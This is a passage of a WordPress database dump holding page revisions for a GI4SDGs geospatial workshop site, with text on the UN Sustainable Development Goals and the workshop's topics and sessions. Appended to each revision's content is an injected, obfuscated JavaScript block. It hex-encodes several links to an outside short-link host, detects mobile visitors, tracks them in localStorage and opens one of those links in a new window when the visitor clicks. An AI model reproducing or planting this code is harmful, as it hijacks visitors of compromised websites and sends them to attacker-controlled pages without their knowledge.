)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:42:02','2022-10-13 23:42:02','',2768,'https://gsw2023.com/?p=2777',0,'revision','',0),
(2778,1,'2022-10-13 23:45:26','2022-10-13 23:45:26','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:45:26','2022-10-13 23:45:26','',2768,'https://gsw2023.com/?p=2778',0,'revision','',0),
(2779,1,'2022-10-13 23:50:32','2022-10-13 23:50:32','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6>\n<strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6>\n<strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6>\n<strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6>\n<strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6>\n<strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6>\n<strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6>\n<strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6>\n<strong>⦁ Other related topics.</strong></h6>\n<h5 style=\"text-align:justify; color:red;\">\n<strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6>\n<strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6>\n<strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6>\n<strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6>\n<strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 